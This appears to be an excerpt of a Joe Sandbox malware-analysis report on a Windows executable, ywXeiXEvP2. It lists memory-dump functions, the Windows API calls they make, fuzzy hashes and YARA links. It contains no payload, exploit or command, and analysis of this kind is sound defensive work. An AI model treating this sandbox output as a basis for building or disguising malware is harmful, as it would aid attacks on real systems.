Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ItemMessageSend
String ID:
API String ID: 3015471070-0
Opcode ID: 39a766f13ec939f6e1c3257cb9b2c56e534004cb78ff04812ec539a8ae924e80
Instruction ID: f73c5da4045c7b9042b74fc2b95e0815cf011c0f2b21ea6afad4b4eadeaceea1
Opcode Fuzzy Hash: 39a766f13ec939f6e1c3257cb9b2c56e534004cb78ff04812ec539a8ae924e80
Instruction Fuzzy Hash: 9BD01750F1868683E620BB11B41D33DD251AB92FA8F900235D98E9A795CF2DB2268B94

Function 00007FF7C0188CF8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE ref: 00007FF7C0188D06

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: b7b94b84bc736c81f561ac6a0213732948c79a519d47e0e60c8097fcab4ddeb2
Instruction ID: 7291791f2ea7436942b898a02987d59c40d14693168a316f435abba37c024a63
Opcode Fuzzy Hash: b7b94b84bc736c81f561ac6a0213732948c79a519d47e0e60c8097fcab4ddeb2
Instruction Fuzzy Hash: 44C08C20F01602C3DA08BF26E8C912CA2A0BB50F14FA08134C90CC12A0DF2CE6AA8791

Function 00007FF7C0184E00 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE ref: 00007FF7C0184E08

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
Instruction ID: dead2b55da87e389424869f51ed547eaafa8f6c32ddbaab43d8e4f8add657dbb
Opcode Fuzzy Hash: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
Instruction Fuzzy Hash: BFB09210B06541C2D6047B22ECC252D9334AB88F11BD84420D90DD1220CF1CD9EB9B00

Non-executed Functions

Function 00007FF7C018E91C Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON

Download Yara Rule

APIs

_Init_thread_footer.LIBCMT ref: 00007FF7C018FCC4

Part of subcall function 00007FF7C018AEE0: LoadStringW.USER32 ref: 00007FF7C018AF67
Part of subcall function 00007FF7C018AEE0: LoadStringW.USER32 ref: 00007FF7C018AF80

Part of subcall function 00007FF7C019EC2C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00007FF7C018FBC5), ref: 00007FF7C019EC60
Part of subcall function 00007FF7C019EC2C: SetLastError.KERNEL32 ref: 00007FF7C019ECA3

Part of subcall function 00007FF7C01812BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C01813B6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC2C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC32
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC38
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC3E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC44
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC4A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC50
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC56
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC5C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC62
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC68
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC6E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC74
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC7A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC80
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC86
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC8C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FC92
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FCCE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018FCD4

Strings

%s: %s, xrefs: 00007FF7C018F3AD
%ls, xrefs: 00007FF7C018EB48, 00007FF7C018EB9B

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
String ID: %ls$%s: %s
API String ID: 2539828978-2259941744
Opcode ID: 1d3cbc19e4e1dbb22a2acefae036e62ad68edc13d54aabbef10823836ec3d9f6
Instruction ID: 3bf188de8e7915b38d08821cfecb79721da16fad43194b68894979869920e281
Opcode Fuzzy Hash: 1d3cbc19e4e1dbb22a2acefae036e62ad68edc13d54aabbef10823836ec3d9f6
Instruction Fuzzy Hash: D9B28262A1868243EA10BF25F4541BEE351EFC5BA0F914336E69D877D6EF2CF6408391

Function 00007FF7C01B59E0 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01B60A2
memcpy_s.LIBCMT ref: 00007FF7C01B6A4F
memcpy_s.LIBCMT ref: 00007FF7C01B6AF6

Part of subcall function 00007FF7C01B6D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01B6D7E

memcpy_s.LIBCMT ref: 00007FF7C01B6BBF

Part of subcall function 00007FF7C01B0510: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01B0535

Strings

1#QNAN, xrefs: 00007FF7C01B6C78
1#SNAN, xrefs: 00007FF7C01B6C59
1#INF, xrefs: 00007FF7C01B6C97
1#IND, xrefs: 00007FF7C01B6C3A

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfomemcpy_s
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 1759834784-2761157908
Opcode ID: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
Instruction ID: fb5a31804df7cef442f635d124504af7e4cd3aca58eedfc80f2bdd524364898e
Opcode Fuzzy Hash: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
Instruction Fuzzy Hash: 3AB2F4B2A082828BE725AF25A4407FDF7A5FB54B98F905135DE0997B84DF3CF5048B90

Function 00007FF7C01872AC Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 00007FF7C018730E
GetFullPathNameW.KERNEL32 ref: 00007FF7C018735A
GetFullPathNameW.KERNEL32 ref: 00007FF7C0187477
GetFullPathNameW.KERNEL32 ref: 00007FF7C01874BC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018762C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0187632
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0187638
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018763E

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: FullNamePath_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1693479884-0
Opcode ID: c5592b693c74ccad0e5d78d632396af68d872ce8b1fec77960f8407698a9532c
Instruction ID: e13ca9e346d50fc15bfa2c16fd4ab821c5c152e9f67d193fbb68630d177a6cff
Opcode Fuzzy Hash: c5592b693c74ccad0e5d78d632396af68d872ce8b1fec77960f8407698a9532c
Instruction Fuzzy Hash: 55A1AE62F14A5186FF00AF79A8445BDE361AB44FB4B954331DE2D97BC8DF2CE2818391

Function 00007FF7C01A6940 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7C01A695C
RtlCaptureContext.KERNEL32 ref: 00007FF7C01A6989
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7C01A69A3
RtlVirtualUnwind.KERNEL32 ref: 00007FF7C01A69E4
IsDebuggerPresent.KERNEL32 ref: 00007FF7C01A6A38
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7C01A6A59
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7C01A6A64

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
Instruction ID: 4f1f8da75f9bfe621f77a5ebbe80650ce78e1b96e6557e6f1c1dd28d5a037448
Opcode Fuzzy Hash: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
Instruction Fuzzy Hash: D7316772604B818AE7609F60F8507EDB364FB44B58F844039DA4D87B95DF7CE658C750

Function 00007FF7C01AAC68 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7C01AACE1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7C01AACF9
RtlVirtualUnwind.KERNEL32 ref: 00007FF7C01AAD34
IsDebuggerPresent.KERNEL32 ref: 00007FF7C01AAD6D
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7C01AAD77
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7C01AAD82

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
Instruction ID: 3f103a67700bd5e7485ea979b1e7b773c7868082a86590c1c36afecf7f7f7ed2
Opcode Fuzzy Hash: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
Instruction Fuzzy Hash: 85318532608B8186D720DF25F8406AEF3A4FB88B64F900135EE8D83B65DF3CE6558B50

Function 00007FF7C01B2F24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01B2F54

Part of subcall function 00007FF7C01AAEC4: GetCurrentProcess.KERNEL32(00007FF7C01B415D), ref: 00007FF7C01AAEF1

Strings

*?, xrefs: 00007FF7C01B2F7B
., xrefs: 00007FF7C01B3374

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
Instruction ID: 82322f51975f6d5aebcd4b1285ba80e3aafd9fb7b838d473ea164ec035252f17
Opcode Fuzzy Hash: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
Instruction Fuzzy Hash: 2A5109A2B1879546EB10EF66A8000BCE7A4FF44FE4B844535EE1D97B85DF3CE0558360

Function 00007FF7C01B5510 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.LIBCMT ref: 00007FF7C01B559B

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction ID: 4cec039fff3f636ea38f6de0bd58f786987b8b29214b43fe8874407cad9b5c97
Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
Instruction Fuzzy Hash: A7D18FB2B1828687DB249F15B18476EF7A1FB88B94F948134DF4A97B44DB3CF8418B50

Function 00007FF7C0183BF8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7C018FD53), ref: 00007FF7C0183C05
FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,00007FF7C018FD53), ref: 00007FF7C0183C39
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,00007FF7C018FD53), ref: 00007FF7C0183C63

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
API String ID: 1365068426-0
Opcode ID: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
Instruction ID: d823fe8804a24357c11dfbe1173864452c0a4382b66dff52d8071fe1920e8b8d
Opcode Fuzzy Hash: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
Instruction Fuzzy Hash: 70011A7160C78682E610AF26B48057EE3A1BB89FE0F884135EA4D86B45DF3CE6159B90

Function 00007FF7C01B3130 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

., xrefs: 00007FF7C01B3374

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
Instruction ID: 5b688ceb10e06e9329df5843130841be537d1ff1ccb007b40d973dd0aac6d272
Opcode Fuzzy Hash: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
Instruction Fuzzy Hash: 4B31D861B186D146E720AE26F8057BEEA95AB44FF4F848235EE6C87BC5CF3CE5118340

Function 00007FF7C01B9008 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF7C01B9255
RaiseException.KERNEL32 ref: 00007FF7C01B9266

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
Instruction ID: 1474910c3c5f1c8b7ed5eb7354ff25b8e3a2235f2bacd175759d3c391bb52b32
Opcode Fuzzy Hash: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
Instruction Fuzzy Hash: E9B17CB3A00B858BEB15DF29D88536CBBA0F784F68F148921DE5D837A4CB39E452C750

Function 00007FF7C019CA30 Relevance: 3.2, APIs: 2, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C019C21C: GetDC.USER32 ref: 00007FF7C019C228
Part of subcall function 00007FF7C019C21C: GetDeviceCaps.GDI32 ref: 00007FF7C019C239
Part of subcall function 00007FF7C019C21C: ReleaseDC.USER32 ref: 00007FF7C019C246

GetObjectW.GDI32 ref: 00007FF7C019CA84

Part of subcall function 00007FF7C019CCEC: GetDC.USER32 ref: 00007FF7C019CD15
Part of subcall function 00007FF7C019CCEC: GetObjectW.GDI32 ref: 00007FF7C019CD43
Part of subcall function 00007FF7C019CCEC: ReleaseDC.USER32 ref: 00007FF7C019CDF7

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ObjectRelease$CapsDevice
String ID:
API String ID: 1061551593-0
Opcode ID: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
Instruction ID: ede7f26def6446bf8fae1fe34eb8726760dd0d8ecd39a1ede9c0153adc0373f2
Opcode Fuzzy Hash: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
Instruction Fuzzy Hash: A6813C76B18A458AEB10DF6AE48066DB771FB88F98F404122DE4E97B64DF3CE105C790

Function 00007FF7C019DE44 Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF7C019DE8D
GetNumberFormatW.KERNEL32 ref: 00007FF7C019DEE9

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
Instruction ID: 5e66286862c72a2eed7f78a8369a3bedfb4c765eec361d0929c5b8485deb56b4
Opcode Fuzzy Hash: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
Instruction Fuzzy Hash: 59115B62A18B8496E621AF51F4402ADF3A0EF88B64FC44135DA4D43B58DF3CF245C794

Function 00007FF7C0186768 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF7C0186799

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
Instruction ID: eab1ce3be21e9f65a388d7816d3cb34d48b545192b6c6bed2589d76492bbf0b3
Opcode Fuzzy Hash: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
Instruction Fuzzy Hash: B301E9759186428BE624AF04F85177DF3A1FB98B64F900234E65D87794DB3CF6019FA0

Function 00007FF7C01AC074 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF7C01AC22B

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

